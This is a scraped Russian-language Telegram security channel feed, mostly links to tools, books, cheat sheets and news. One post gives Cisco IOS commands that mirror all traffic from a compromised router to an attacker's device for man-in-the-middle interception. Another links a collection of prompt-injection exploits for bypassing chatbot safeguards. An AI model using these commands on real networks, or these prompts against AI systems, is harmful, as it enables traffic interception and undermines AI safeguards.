Golden HackSpace | Hacker notes – Telegram
Golden HackSpace | Hacker notes
527 subscribers
91 photos
3 videos
37 files
147 links
Авторский канал по современной кибербезопасности без воды и лишнего мусора.

По вопросам можно обращаться в директ канала.
Download Telegram
OSEP PEN 300.pdf
27 MB
🔥Evasion Techniques and
Breaching Defenses

#book #learn
Forwarded from RESOLUTE ATTACK
⚡️FREE OPEN SOURCE TOOLS

Инструкторы SANS создали листинг с более 150 инструментов с открытым исходным кодом, которые могут улучшить безопасность и эффективность

#Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🔥Tool for threat hunting in Azure

Умеет распознавать по MITRE

https://github.com/BlueTeamLabs/sentinel-attack

#azure #threathunting #dfir #sysmon #mitre
Forwarded from CrackCodes 🇮🇳 (Hayper)
🕵️‍♂️Руководство по поиску в твиттере(расширенный вариант)

🕵️‍♂️Twitter Search Guide (extended version)

#osint #twitter‌‌

Translation: ru-en
🕵️‍♂️Twitter Search Guide (Advanced)

🕵️‍♂️Twitter Search Guide (extended version)

#osint #twitter‌‌
🔥ChatGPT bot

Для тех, кто хочет поднять своего бота

https://github.com/altryne/chatGPT-telegram-bot/

#chatgpt #ai #telegram #bot
🔥403 bypass

#waf #bypass #forbidden
👌1
Golden HackSpace | Hacker notes
🔥403 bypass #waf #bypass #forbidden
🔥403 Bypasser

Автоматика для пассивного тестирования в Burp

https://github.com/sting8k/BurpSuite_403Bypasser

#forbidden #bypass #waf
Coolest_Careers_in_Cybersecurity-1.png
5.4 MB
🔥Infosec направления

Также есть ссылки на курсы от SANS, которые связаны с направлением.

Ставь лайк, если ты тут есть😄

#infosec #sans #learn #courses
👍1🔥1
🔥Cool cheatsheet's

Сборник красивых шпаргалок и иллюстраций. Очень хорошо подойдет, чтобы дать мозгу отдохнуть и посмотреть прикольные схемки.

https://securityzines.com/

#learn #cheatsheet
🔥Neural networks list

Список нейронок, которые отсортированы по категориям

Думаю, что-нибудь для себя точно найдете

https://share-docs.clickup.com/25598832/d/h/rd6vg-14247/0b79ca1dc0f7429

#ai #neural
🔥1
🔥Benchmark of subdomain enumeration tools

#subdomain #enumeration #recon #tool #benchmark
🔥1
🔥Traffic mirroring

///Идея///

Если при пентесте сети есть скомпрометированный маршрутизатор Cisco, то можно попробовать сделать зеркалирование траффика

///Реализация///

Создаем профиль ToAttacker для экспорта трафика:

router(config)#ip traffic-export profile ToAttacker mode export

Указываем экспорт всего траффика:

router(conf-rite)#bidirectional

На какой интерфейс экспортируем:

router(conf-rite)#interface FastEthernet0/1

Какому mac адресу произвести передачу траффика, указываем наш MAC:

router(conf-rite)#mac-address 72db.9842.4f97
router(conf-rite)#exit

На каком интерфейсе будем слушать траффик:

router(config)#interface FastEthernet0/0
router(config-if)#ip traffic-export apply ToAttacker

///Заключение///

По итогу реализации, маршрутизатор будет слать весь траффик на подконтрольное устройство, что дает нам полноценный MITM.

Недостатком данного способа является то, что подконтрольное устройство должно находиться в одной сети с маршрутизатором.

#cisco #mitm
👍3
Forwarded from Lazarus
👮 Роскомнадзор запустил систему автоматического поиска запрещенного контента «Окулус»

Главная задача «Окулус» – это выявление нарушений российского законодательства в изображениях и видеороликах. Система способна автоматически искать и распознавать нарушения закона в сети интернет.

«Система распознает изображения и символы, противоправные сцены и действия, анализирует текст в фото- и видеоматериалах. «Окулус» автоматически обнаруживает такие правонарушения, как экстремистская тематика, призывы к массовым незаконным мероприятиям, суициду, пронаркотический контент, пропаганда ЛГБТ и другие запрещённые действия», – пояснил СМИ представитель ГРЧЦ.

@Lazarus_link
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🔥Prompt injection

Промпты, которые позволяют обойти цензуру ботов.

https://github.com/Cranot/chatbot-injections-exploits

#chatbot #chatgpt #bypass